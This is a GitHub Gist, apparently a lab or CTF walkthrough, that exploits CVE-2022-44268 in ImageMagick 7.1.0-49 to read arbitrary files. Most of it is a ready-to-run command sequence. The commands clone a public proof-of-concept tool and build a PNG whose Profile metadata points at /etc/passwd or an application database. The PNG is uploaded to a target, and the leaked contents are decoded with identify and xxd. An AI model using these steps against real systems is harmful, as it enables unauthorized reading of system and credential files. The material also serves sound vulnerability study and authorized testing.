Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save strikoder/f5e743bbd00685453bb0b990f0aa22a5 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/f5e743bbd00685453bb0b990f0aa22a5 to your computer and use it in GitHub Desktop.
ImageMagick 7.1.0-49 LFI (CVE-2022-44268) - Read arbitrary files through malicious PNG with embedded Profile field, exploiting metadata processing to extract sensitive data

ImageMagick LFI via Profile Metadata Injection (CVE-2022-44268)

Vulnerability Overview

CVE-2022-44268 affects ImageMagick 7.1.0-49 and allows arbitrary file read through crafted PNG images. This exploit chain leverages two vulnerabilities:

  1. DoS via - filename: Providing - as a filename causes the program to hang
  2. LFI via Profile metadata: Injecting a Profile field into image metadata allows reading arbitrary files

Scenario

  • Target: ImageMagick 7.1.0-49 processing images
  • Attack Vector: Malicious PNG with embedded Profile metadata
  • Goal: Extract sensitive files (e.g., /etc/passwd, /var/db/pilgrimage)

Exploitation Steps

1. Create Malicious PNG with LFI Payload

# Clone the LFI PoC tool
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc
cd imagemagick-lfi-poc

# Install dependencies (if needed)
pip3 install pypng

2. Generate Exploit Image

# Create PNG with Profile pointing to target file
python3 generate.py -f /etc/passwd -o exploit.png

The script embeds Profile: /etc/passwd into the image metadata. When ImageMagick processes this image, it reads and includes the file contents.

3. Upload and Trigger Processing

# Upload the malicious PNG to the target system
# Wait for ImageMagick to process it (via cron job, web upload, etc.)

4. Download and Extract File Contents

# Download the processed image
# Extract metadata with verbose output
identify -verbose exploit.png > img.hex

# Convert hex dump to readable format
cat img.hex | xxd -r -p
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment